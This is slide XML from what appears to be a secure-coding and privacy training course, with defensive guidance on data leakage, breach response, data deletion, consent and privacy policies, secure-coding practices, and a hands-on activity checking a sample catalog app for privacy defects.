              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intentional malicious breach.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unintentional mistake. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Defects in the software may enable such leakage, such as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Weak or poorly implemented access management controls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To avoid this defect:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement effective and secure access management controls.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encrypt data at rest and in transit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement effective, secure appropriate identity and access management.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide awareness training for all employees on handling personal data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement a data classification and information handling policy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement tools like data leakage prevention and SIEMs to monitor and detect data leaked from endpoints, web portals, and cloud services.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement privacy by design.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Anonymize personal data.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent Operator-Sided Data Leakage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>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535EE63F-A20E-4284-8320-43FE25D7F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534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105</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981201" y="1302040"/>
            <a:ext cx="6820873" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A data breach should be followed up with an appropriate response.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Limit the extent of the leak, inform those who are affected, and remedy defects or problems that made the breach possible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To avoid this defect:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide continuous monitoring and logging features to monitor for situations that might indicate personal data leakage and loss.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide features to warn users of possible suspicious activity in their accounts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create, maintain, and periodically test an incident response plan.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Continuously monitor for personal data leakage and loss.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When a breach occurs:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Validate that the breach occurred.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Determine the most effective way to prevent further leakage, and implement it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assign an incident manager to be responsible for the investigation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Decide how to investigate and respond to the data breach to ensure that evidence is appropriately handled.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assemble an incident response team.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Notify affected people as appropriate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Determine whether to notify the authorities as appropriate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remedy any defects or problems that made the breach possible.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Respond Appropriately to Data Breaches</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>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382D263E-C3A4-4F8F-B6BE-803ADA03F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0664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106</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981201" y="1302040"/>
            <a:ext cx="6820873" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Defects make the software fail to delete private or sensitive data that is no longer needed, putting privacy at risk.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To avoid this defect:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Design the software to minimize data that is stored in the first place.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Promptly delete data that is no longer needed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Properly delete data when a user issues a rightful request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Securely lock the data from any access until deletion is possible, if prompt deletion is not possible due to technical restrictions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure prompt deletion of data in backups, copies, cloud storage, or data shared with third-party sources.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clearly inform users when backups must be kept, as required by law.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide evidence (such as logging and messaging to the user) to verify deletion according to policy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify deletion policies (circumstances under which data must be deleted, and the timeframe for deletion), and implement </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>automation and/or manual procedures to ensure </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>that happens.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Delete Private or Sensitive Data That is No Longer Needed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>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873EFB32-7D6F-44A2-9280-2B2B3CE2C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31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107</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981201" y="1302039"/>
            <a:ext cx="6820873" cy="5095585"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The software may not make it clear to users what it will do with their data so users can make good decisions about how to manage their data within the software. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To avoid this defect:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide release notes with software updates to clearly and simply explain how terms and conditions change over time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Track which users have consented to the terms and conditions, including the version if terms and conditions have changed over time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement a Do Not Track feature on the server side, so users can disable tracking, and provide an opt-out capability for users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide users with a list of all tracking mechanisms used in the software, explaining how and by whom the information is used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inform users (through a clear and well-written terms and conditions page, for example) how data is processed, including collection, storage, processing, and deletion.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consider using a readability tester (such as </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://readable.io/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) to help you verify that </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>your terms and conditions are easy to read.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make Sure Privacy Policies, Terms and Conditions are Clear</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>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9DB95130-9FBC-43D2-B431-41674E465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838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108</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981201" y="1302040"/>
            <a:ext cx="6820873" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When data that is not needed to meet requirements is collected, it needlessly puts privacy at risk. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To avoid this defect:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not collect descriptive, demographic, or any other user-­related data that are not needed for the purposes of the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enable users to opt out of providing additional data to improve the service.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do Not Collect Non-Essential Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>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810DB784-E510-4A97-933A-118CFBC6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8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109</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981201" y="1302040"/>
            <a:ext cx="6820873" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The software should not provide data to a third party without obtaining the user's consent.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To avoid this defect:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Acquire and document the user's consent for any data collected before the data is actually collected.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Acquire and document the user's consent for any additional data that is collected later (due to software feature updates or new compliance requirements, for example).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mark web requests as Do Not Track, complying with the latest W3C standards.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Anonymize personal data before sharing it with a third party.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not share data inadvertently by embedding third­-party resources such as third­-party hosted JavaScript, JavaScript widgets, analytics components, advertisements, and so forth.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do Not Share Data without Consent</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1143000"/>
            <a:ext cx="1635384" cy="1946707"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="76200" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B7DF716-5957-4723-95BC-B06069168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8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05426C-D9F0-4DC6-A55A-FA0667D02B60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6581C6AD-AA95-4DA9-9923-910498F7A9D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent race conditions by preventing multiple simultaneous requests (locking) or through a synchronization mechanism.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect shared variables and resources from inappropriate concurrent access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When the application requires elevated privileges, raise privileges as late as possible, and drop them as soon as possible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Eliminate the possibility of calculation and overflow errors. Look for:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Conversion and casting between data types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Values that are too large or too small to fit within the allocated range</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Truncation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discrepancies in byte size, precision, signed/unsigned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NaN (not a number) calculations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use code-signing, such as checksums or hashes, to verify the integrity of code including libraries, executables, interpreted code, resources, and configuration files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A01480B-C33B-42F3-A485-7AA1FEEAD991}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Guidelines for Secure Coding—2 (Slide 1 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69306985-1753-44D8-83AA-18164A86D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97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278000-1207-402D-9189-582A2BD132D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>110</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EBA616E-66B1-42B4-A276-0B8F23FD098B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You will examine the Woodworkers Wheelhouse Catalog app for privacy defects.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Anything that identifies the user in transactions with the system should not be modifiable by the user as it could lead to a privacy defect.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A user ID passed directly in a URL querystring parameter could be modified by a user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker could easily try out different querystring parameters until finding one that works.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other storage—such as cookies, session storage, and client-side variables—are also visible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You will investigate session storage to see if any identifying information is there.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FB08494-3327-4FA5-9161-660AACA17271}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Activity: Handling Privacy Defects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CC3715D-27FC-42B2-AE2F-E5D64A38036D}"/>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6"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5194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111</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
